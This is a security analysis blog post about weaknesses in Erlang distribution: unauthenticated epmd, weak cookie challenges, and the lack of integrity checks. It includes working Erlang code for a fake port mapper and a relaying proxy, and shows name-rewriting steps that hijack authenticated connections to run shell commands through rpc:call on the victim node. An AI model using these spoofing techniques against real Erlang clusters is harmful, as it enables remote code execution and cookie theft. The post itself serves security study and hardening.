Fix anomalies in epmd not yet reported as security issues

Use erts_(v)snprintf to ensure no buffer overruns in debug printouts.
Disallow everything except port and name requests from remote nodes.
Disallow kill command even from localhost if alive nodes exist.
-relaxed_command_check when starting epmd returns the possibility to kill this epmd when nodes are alive (from localhost).
Disallow stop command completely except if -relaxed_command_check is given when epmd was started.
Environment variable ERL_EPMD_RELAXED_COMMAND_CHECK can be set to always get -relaxed_command_check.
Fortunately (for those wishing to spoof the protocol), there are still other ways to kill epmd.
Awesome work by the Erlang/OTP team!
One of the unique features of the Erlang programming language is the transparent, built in distribution. The unit of activity in Erlang is the process. Processes run on nodes which reside locally or on remote servers, communicating by message passing. If a process somewhere crashes, a linked process running on another server can detect the crash and perform error recovery.
Erlang distribution is very easy to use, pretty much working out of the box. But users are often warned that, in the default configuration, the Erlang distribution protocol is insecure and should only be run on trusted networks:
[The cookie authentication mechanism] is not entirely safe, as it is vulnerable against takeover attacks, but it is a tradeoff between fair safety and performance.
So the questions are: what are the risks in running a distributed Erlang node, where can distribution be used safely and what can be done to limit potential attacks against it?
Source code is available on GitHub.
Erlang Distribution
The Erlang Port Mapper Daemon
Distributed Erlang nodes bind a random TCP port for distribution requests. The Erlang port mapper daemon, or epmd, maps the name of the node to the port on which the node is listening.
epmd acts as a key/value store. A node registers with epmd by opening a TCP connection to localhost on a well known port (4369). The node sends a message containing the node name and distribution port. The node is now registered and will remain registered until the TCP connection is dropped.
An example of a registration message is:
    %% Key is the node name (a binary), Value is the distribution port.
    register({IP, Port}, Key, Value) ->
        Packet = <<
            120,                  % ALIVE2_REQ: x
            Value:16,             % PortNo
            77,                   % NodeType: normal Erlang node
            0,                    % Protocol: TCP
            0,5,                  % Highest Version
            0,5,                  % Lowest Version
            (byte_size(Key)):16,  % NLen
            Key/bytes,            % NodeName
            0,0                   % ELen
        >>,
        {ok, Socket} = gen_tcp:connect(IP, Port, [
            {packet,2},
            {active, true},
            binary
        ]),
        ok = gen_tcp:send(Socket, Packet),
        wait(Socket).

    %% Hold the connection open: closing it deregisters the node.
    wait(Socket) ->
        receive
            _ -> wait(Socket)
        end.
A Distributed Erlang Node
A node is started in distributed mode when the -sname or -name option is passed on the command line to the erl command. Erlang will start an epmd process if one is not already running.
When a request is made to connect to another distributed Erlang node, for example by using net_adm:ping('node@example.com'), the Erlang node will resolve the portion of the node name after the @ symbol (or use localhost, if the node is brought up using -sname), and send a PORT_PLEASE2_REQ request for the name (the portion of the atom preceding the @ sign) to the resolved IP address. epmd responds with a message containing the node's port and closes the connection.
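The lookup described above can be sketched as a pair of pure functions. This is only an illustration: the module and function names are made up for this example, the request byte (122) and response byte (119) are taken from the fake epmd code later in this post, and the 2 byte length header is assumed to be added by the {packet, 2} socket option.

```erlang
-module(epmd_port_sketch).
-export([split_node/1, port_please2_req/1, parse_port2_resp/1]).

%% Split 'name@host' into the name epmd knows and the host to resolve.
split_node(Node) when is_atom(Node) ->
    [Name, Host] = string:split(atom_to_list(Node), "@"),
    {Name, Host}.

%% PORT_PLEASE2_REQ: the byte 122 ("z") followed by the node name.
port_please2_req(Name) when is_list(Name) ->
    <<122, (list_to_binary(Name))/binary>>.

%% Response: 119 ("w"), a result byte (0 means found), the port, and
%% the fields the node supplied when it registered.
parse_port2_resp(<<119, 0, Port:16, _NodeType, _Protocol,
                   _Highest:16, _Lowest:16,
                   NLen:16, Name:NLen/binary, _Extra/binary>>) ->
    {ok, binary_to_list(Name), Port};
parse_port2_resp(<<119, Result, _/binary>>) when Result > 0 ->
    {error, Result}.
```

A caller would resolve the host returned by split_node/1, connect to the epmd port on that address, send the request and hand the reply to parse_port2_resp/1.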
The originating Erlang node now opens a TCP connection to the destination Erlang node's distribution port. The nodes authenticate each other using the Erlang cookie mechanism. If the challenge handshake succeeds, the nodes are connected. Communication is bidirectional. This link will be used for all distributed operations between the two nodes.
Erlang Cookies
Erlang cookie authentication resembles RADIUS, CHAP and X11 magic cookies. Cookies are a secret that must be known on all members of the Erlang cluster. Valid characters in a cookie are ASCII 32-126 (space to tilde).
Generating the Erlang Cookie
If a secret is not provided, Erlang will generate a 20 byte file in the user's home directory (~/.erlang.cookie) composed of uppercase letters. Erlang uses a weak pseudo-random number generator with an implementation similar to rand(3). The seed is the seconds and microseconds fields of erlang:now(). The returned random value acts as the seed for the next random value until 20 uppercase letters are chosen. The creation time of the ~/.erlang.cookie file is changed to midnight to obscure the initial seed value.
The Challenge Handshake
The challenge process is explained in the Erlang kernel documentation. After the TCP connection is established, the originating node sends:
- "n"
- Version0
- Version1
- Flag0
- Flag1
- Flag2
- Flag3
- Name0
- Name1
- Name2
- ...
- NameN
The destination node replies with a status message indicating how the originating node may proceed. For example, the connection might not be allowed because a connection is in progress or might already exist.
- "s"
- Status0
- Status1
- ...
- StatusN
If the connection may proceed, the destination node then sends its challenge:
- "n"
- Version0
- Version1
- Flag0
- Flag1
- Flag2
- Flag3
- Challenge0
- Challenge1
- Challenge2
- Challenge3
- Name0
- Name1
- Name2
- ...
- NameN
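The three messages listed above map directly onto Erlang binary syntax. The following is a minimal sketch, not code from the OTP sources: the module name and function names are hypothetical, multi-byte fields are assumed to be big-endian, and the length header is assumed to be handled by the {packet, 2} socket option. Both "n" messages share a tag, so the decoder is told which one to expect from its position in the exchange.

```erlang
-module(dist_msg_sketch).
-export([send_name/3, status/1, send_challenge/4, decode/2]).

%% "n", Version (2 bytes), Flags (4 bytes), Name
send_name(Version, Flags, Name) when is_binary(Name) ->
    <<$n, Version:16, Flags:32, Name/binary>>.

%% "s", Status
status(Status) when is_binary(Status) ->
    <<$s, Status/binary>>.

%% "n", Version, Flags, Challenge (4 bytes), Name
send_challenge(Version, Flags, Challenge, Name) when is_binary(Name) ->
    <<$n, Version:16, Flags:32, Challenge:32, Name/binary>>.

%% The first argument says which message is expected at this step.
decode(name, <<$n, Version:16, Flags:32, Name/binary>>) ->
    {name, Version, Flags, Name};
decode(status, <<$s, Status/binary>>) ->
    {status, Status};
decode(challenge, <<$n, Version:16, Flags:32, Challenge:32, Name/binary>>) ->
    {challenge, Version, Flags, Challenge, Name}.
```

Note that the node name travels in the clear and is simply the tail of the message, which matters for the rewriting attacks described later.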
The challenge is a 32-bit integer generated as follows:

    %% ---------------------------------------------------------------
    %% Challenge code
    %% gen_challenge() returns a "random" number
    %% ---------------------------------------------------------------
    gen_challenge() ->
        {A,B,C} = erlang:now(),
        {D,_} = erlang:statistics(reductions),
        {E,_} = erlang:statistics(runtime),
        {F,_} = erlang:statistics(wall_clock),
        {G,H,_} = erlang:statistics(garbage_collection),
        %% A(8) B(16) C(16)
        %% D(16),E(8), F(16) G(8) H(16)
        ( ((A bsl 24) + (E bsl 16) + (G bsl 8) + F) bxor
          (B + (C bsl 16)) bxor
          (D + (H bsl 16)) ) band 16#ffffffff.

The originating node computes the digest by concatenating the challenge with the cookie and digesting the result using MD5:

    %% Generate a message digest from Challenge number and Cookie
    gen_digest(Challenge, Cookie) when is_integer(Challenge), is_atom(Cookie) ->
        erlang:md5([atom_to_list(Cookie)|integer_to_list(Challenge)]).

The resulting 16 byte MD5 digest is sent to the destination node along with a new 4 byte challenge.
- "r"
- Challenge0
- Challenge1
- Challenge2
- Challenge3
- Digest0
- Digest1
- Digest2
- ...
- Digest15
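The destination node checks the digest and, if it matches, acknowledges with its own digest of the new challenge:
- "a"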
- Digest0
- Digest1
- Digest2
- ...
- Digest15
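The reply and acknowledgement can be sketched with the same gen_digest/2 shown above. The module and the other function names are invented for this illustration, and the length header is again left to {packet, 2}. The point to notice is what goes into the digest: only the challenge and the cookie, never the node names.

```erlang
-module(dist_auth_sketch).
-export([gen_digest/2, challenge_reply/3, check_reply/3,
         challenge_ack/2, check_ack/3]).

%% Same construction as gen_digest/2 above: MD5 over cookie ++ challenge.
gen_digest(Challenge, Cookie) when is_integer(Challenge), is_atom(Cookie) ->
    erlang:md5([atom_to_list(Cookie) | integer_to_list(Challenge)]).

%% Originating node: answer TheirChallenge and issue MyChallenge.
challenge_reply(MyChallenge, TheirChallenge, Cookie) ->
    <<$r, MyChallenge:32, (gen_digest(TheirChallenge, Cookie))/binary>>.

%% Destination node: verify the reply against the challenge it sent.
check_reply(<<$r, NewChallenge:32, Digest:16/binary>>, SentChallenge, Cookie) ->
    case gen_digest(SentChallenge, Cookie) of
        Digest -> {ok, NewChallenge};
        _ -> {error, bad_digest}
    end.

%% Destination node: prove knowledge of the cookie in turn.
challenge_ack(NewChallenge, Cookie) ->
    <<$a, (gen_digest(NewChallenge, Cookie))/binary>>.

%% Originating node: verify the acknowledgement.
check_ack(<<$a, Digest:16/binary>>, MyChallenge, Cookie) ->
    Digest =:= gen_digest(MyChallenge, Cookie).
```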
Abusing epmd
Running epmd
epmd comes from an environment where physical servers are dedicated to a single task. Probably all Erlang nodes ran under a single UID.
On multiuser systems, such as development servers or systems that require some privilege separation, the first Erlang node to run starts and controls the epmd process. This user can now control the port map requests given for other nodes. The user running epmd can also snoop name requests.
The temptation might be to explicitly start epmd as root at boot. Use a dedicated user instead: there is no reason for epmd to run as root.
epmd Authentication
epmd only requires a few operations: registering a node name and port, retrieving a port based on node name, retrieving all names and ports known to the epmd process (as well as some debug info, if requested), and shutting down epmd.
Though logically these operations are distinct for remote and local access (a remote node, for example, would never register a node/port value, since ports are local to the node and do not include the IP address; in fact, the epmd command line flags such as "-names" will only connect to localhost), no distinction is made between local and remote access to epmd. Authentication is not required to query epmd.
Any device that is allowed to open a TCP connection to the epmd port can:
- issue a kill command and shut down the epmd process: any new attempts at joining in Erlang distribution with nodes residing on this server will fail
- set any key/value pair
- bypass network segmentation: if 2 hosts can talk to the host running epmd but not each other
- establish a covert channel
- interprocess communication, like a command queue for bots
- tunnelling data: TCP over epmd over TCP!
- storage of data: the basis of a FUSE filesystem
Abusing Cookies
The cookie mechanism only proves that, for the given TCP connection, there is knowledge of the secret. Though the node names are included in the challenge message, they are not included in the digest. Similarly, neither IP addresses nor timestamps are included in the digest. The Erlang cookie authentication also does not validate the data sent after the handshake is completed, so there is no integrity checking built into the distribution protocol.
Replaying the Challenge
Challenge responses are generated by concatenating a 4 byte challenge with the secret cookie and digesting the result using MD5. The Erlang kernel documentation for this process notes the 32-bit integer used as the challenge must be very random, but really it needs only to be well distributed. The response to the challenge proves the node knows the secret. At least in theory, the only practical way to derive the secret from the digest is using brute force. But knowing the response to the challenge is equivalent to knowing the secret, if the challenge is ever repeated. The strength of the cookie mechanism lies in the time before a challenge is repeated.

    1> cookie:start().
    {11487,
     {found,{3534940387,971},
            [88321801,88780553,92321534,93695753,94154505,94809865,
             95268617,96843513,97367801,97957625,98481913,99071742,
             99596030,100120318,100644606,172271960,172796248,173320536,
             174041432,176726281,177250569,177774857,178561289,
             179085577|...]}}

In the above test, an attacker would have had to snoop 971 handshakes before there is a repeated challenge. There are 2 challenges for each authentication. Only one successful connection is needed since the attacker can run erlang:get_cookie() once authenticated. However, being able to replay a challenge requires being able to somehow snoop connections. And for most systems, authentication is a rare event, since TCP connections for internode communication are persistent.
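To make "time before a challenge is repeated" concrete, here is a small sketch for finding the first repeat in a list of observed challenges. It is a hypothetical helper written for this illustration, not the cookie module used in the test above. For comparison it also computes the usual birthday estimate of how many draws are expected before a repeat, which only holds under the assumption that challenges are uniformly distributed over the whole range (roughly 82,000 draws for 32 bits).

```erlang
-module(challenge_repeat_sketch).
-export([first_repeat/1, expected_until_repeat/1]).

%% Return {found, Challenge, FirstIndex, RepeatIndex} for the first
%% challenge seen twice (1-based positions), or none.
first_repeat(Challenges) ->
    first_repeat(Challenges, 1, #{}).

first_repeat([], _N, _Seen) ->
    none;
first_repeat([C | Rest], N, Seen) ->
    case maps:find(C, Seen) of
        {ok, First} -> {found, C, First, N};
        error -> first_repeat(Rest, N + 1, Seen#{C => N})
    end.

%% Birthday estimate: about sqrt(pi/2 * 2^Bits) draws before a repeat,
%% ASSUMING uniformly distributed challenges.
expected_until_repeat(Bits) ->
    math:sqrt(math:pi() / 2 * math:pow(2, Bits)).
```

A repeat that shows up far earlier than the estimate suggests the challenge generator is not well distributed.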
Brute Force
Since all nodes share the same cookie, and given that cookies likely change very rarely, it's possible for the attacker to open connections to each node and brute force in parallel. Since MD5 is quite fast, and there is no provision in the protocol to slow down the digesting process, many attacks can be run.
MITM
For many environments, the threat of replay and brute force might not be that bad. While they are feasible, if you do any sort of monitoring, you'll very likely notice an attack in progress. The lack of any sort of integrity protection is a real issue; one that Erlang developers have addressed, to an extent, with the SSL transport mechanism.
Proxying from a Local Node
Since anyone can stop epmd, an attacker on the same server can bring up their own port mapper service. When epmd is killed, the attached Erlang nodes will not attempt to reconnect. An attacker can listen on any available port, open a connection to the distribution port of the Erlang node that is being targeted and advertise the port of the spoofing proxy in response to any distribution requests.
spoofed contains some code to demonstrate this sort of attack. First, we retrieve the ports known to epmd by sending a names request (the letter "n", with a 2 byte length header):

    names(IP, Port) ->
        Packet = list_to_binary([<<110>>]),
        {ok, Socket} = gen_tcp:connect(IP, Port, [
            {packet,2},
            {active, true},
            binary
        ]),
        ok = gen_tcp:send(Socket, Packet),
        wait(Socket).

Next, we set up a fake epmd to answer port map requests. The fake epmd binds the well-known epmd port and spawns a process to handle each TCP connection. For most message types, the client expects epmd to close the connection after responding. The exception is node registration: breaking the connection will deregister the node.
    loop(Socket, Port) ->
        receive
            {tcp, Socket, <<110>>} ->
                inet:setopts(Socket, [{packet, 0}]),
                Response = list_to_binary([
                    <<4369:32>>,    % the names response starts with the epmd port
                    lists:flatten(io_lib:format("I can haz ~s at port ~p~n", ["fake", Port]))
                ]),
                error_logger:info_report([{epmd, names_request}, {response, Response}]),
                ok = gen_tcp:send(Socket, Response);
            {tcp, Socket, <<122, Node/binary>>} ->
                inet:setopts(Socket, [{packet, 0}]),
                Response = <<
                    119,                   % PORT_PLEASE2_REQ response
                    0,                     % Result: no error
                    Port:16,               % PortNo
                    77,                    % NodeType: normal Erlang node
                    0,                     % Protocol: TCP
                    0,5,                   % Highest Version
                    0,5,                   % Lowest Version
                    (byte_size(Node)):16,  % NLen
                    Node/bytes,            % NodeName
                    0,0                    % ELen
                >>,
                error_logger:info_report([{epmd, Node}, {response, Response}]),
                ok = gen_tcp:send(Socket, Response);
            {tcp_closed, Socket} ->
                error_logger:info_report([{epmd, tcp_close}]);
            {tcp_error, Socket, Reason} ->
                error_logger:info_report([{epmd, tcp_error}, {reason, Reason}])
        end.

Finally, we set up the proxy to listen on the fake Erlang distribution port. The proxy simply relays any data, including the challenge handshake. Since the origin and destination nodes presumably share a common cookie, the authentication will succeed. Assuming 59000 is the distribution port of the Erlang node and port 59001 is unbound, we could run a proxy as follows:

    spoof:kill().
    spoof:epmd(59001).         % where the argument is where our proxy port will be listening
    spoof:proxy(59000, 59001). % Erlang distribution port, fake Erlang node proxy port

At this point we can snoop the data being sent between nodes. Of course, we still do not know the cookie, only a derived secret (probably 2 of them), but the TCP connection from our proxy is fully authenticated. We could drop the connection to the originating node at this point and send our own messages as a fully connected distributed node:

    (n@ack.lan)1> erlang:get_cookie().
    mysecretcookie

However, we can also modify the connection in interesting ways:

    1> F = fun(in,X) -> re:replace(X, "foo", "bar", [{return, binary}]);
    1>         (out,X) -> X end.
    2> spoof:proxy(59000, 59001, F).
    3> foo == bar.
    true
    4> Afoo = 123.
    123
    5> Afoo.
    123
    6> Abar.
    123
    7> rpc:call('n@ack.lan', os, cmd, ["echo foofoo"]).
    "barfoo\n"
    8> rpc:call('n@ack.lan', os, cmd, ["touch /tmp/ohaifoothere"]).
    []
    9> rpc:call('n@ack.lan', os, cmd, ["ls /tmp/ohaifoothere"]).
    "/tmp/ohaibarthere"
Proxying from a Remote Node
Assuming an attacker can convince an Erlang node to connect to a host under their control (using DNS poisoning, ARP spoofing, social engineering, ...), the attacker can proxy the connection anywhere. There's a problem with proxying a connection from a host to a node that is not local, though. The challenge messages contain the full name of the node that is sending the message, including the domain name. Assume there are 3 nodes: nul.lan (the originating node), ecn.lan (the destination node) and ack.lan (the attacker). If an Erlang node on nul.lan accidentally connects to ack.lan intending to reach ecn.lan (or any other node sharing the same cookie), ack.lan can forward the connection to ecn.lan. nul.lan may not even have intended to connect to ecn.lan.

    spoof:kill().
    spoof:epmd(59001).
    spoof:proxy({{10,10,10,10},59000}, 59001, F).

Since the source/destination node names will not match, we will need to rewrite them for this to work, but since there are no integrity checks, the process works transparently:

    F = fun(in,X) -> re:replace(X, "@ack.lan", "@ecn.lan", [{return, binary}]);
           (out,X) -> re:replace(X, "@ecn.lan", "@ack.lan", [{return, binary}])
        end.
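One detail worth spelling out: every hostname in these examples has the same length. Assuming the proxy forwards raw bytes, length headers included (an assumption, since the proxy internals are not shown here), a replacement of a different length would leave the headers describing the wrong number of bytes. The sketch below makes that constraint explicit with a guard. It uses binary:replace/4 rather than the re:replace/4 call shown above, and the module and function names are hypothetical.

```erlang
-module(rewrite_sketch).
-export([rewrite/2, swap/3]).

%% Direction-aware rewrite, in the same shape as the fun F above.
rewrite(in, Bin) -> swap(Bin, <<"@ack.lan">>, <<"@ecn.lan">>);
rewrite(out, Bin) -> swap(Bin, <<"@ecn.lan">>, <<"@ack.lan">>).

%% Only same-length substitutions are accepted, so the total size of
%% the message (and any length header in front of it) is unchanged.
swap(Bin, From, To) when byte_size(From) =:= byte_size(To) ->
    binary:replace(Bin, From, To, [global]).
```

Unlike the fun above, this replaces every occurrence in the buffer, not just the first.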
Forcing a Node to Connect to Itself
Even on a network where the attacker does not know which nodes share the same cookie, an Erlang node can always be forced to connect to itself. Since the Erlang node will use its cookie for both sides of the authentication, it will, of course, succeed. The attacker will only need to rewrite the node names, e.g., if ecn.lan thinks it's talking to ack.lan:

    1> F = fun(in,X) -> re:replace(X, "@ecn.lan", "@ack.lan", [{return, binary}]);
    1>         (out,X) -> re:replace(X, "@ack.lan", "@ecn.lan", [{return, binary}]) end.
    2> spoof:proxy({IP, Port}, ProxyPort, F).

    erl -name r@nul.lan -remsh n@ack.lan
    1> os:cmd("hostname").
    "ecn.lan\n"

This would work, for example, against a user connecting from a laptop to a node using erl -remsh or running etop:start([{node, 'node@example.com'}]). (It's worth mentioning as well, since I've never seen it discussed, that if you connect in to a distributed Erlang node, everybody who's authenticated to connect to that node has complete access to your workstation as your uid.)
"Legitimate" Uses
spoofed could be used as an example for creating an epmd that provides some protection against remote nodes abusing it and for creating Erlang distribution proxies. An Erlang distribution proxy could potentially have these advantages:
- listens only to a single port
- authentication mechanisms (GSS-API, SSL, etc)
- could allow creating sandboxes by parsing the distribution messages
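As a rough idea of what "some protection against remote nodes" might look like in a replacement epmd, the sketch below lets remote peers issue only names (110) and port (122) requests and leaves everything else, such as registration (120), to loopback clients. The module and function names are invented for this example, and the policy is deliberately simplistic: it treats every local request as allowed.

```erlang
-module(epmd_filter_sketch).
-export([is_local/1, allowed/2]).

%% Loopback addresses, IPv4 and IPv6.
is_local({127, _, _, _}) -> true;
is_local({0, 0, 0, 0, 0, 0, 0, 1}) -> true;
is_local(_) -> false.

%% Remote peers may only ask for names (110) or a port (122).
allowed(<<Tag, _/binary>>, Addr) ->
    case is_local(Addr) of
        true -> true;
        false -> lists:member(Tag, [110, 122])
    end.
```

In a connection handler, the peer address could be obtained with {ok, {Addr, _Port}} = inet:peername(Socket) before the request is dispatched.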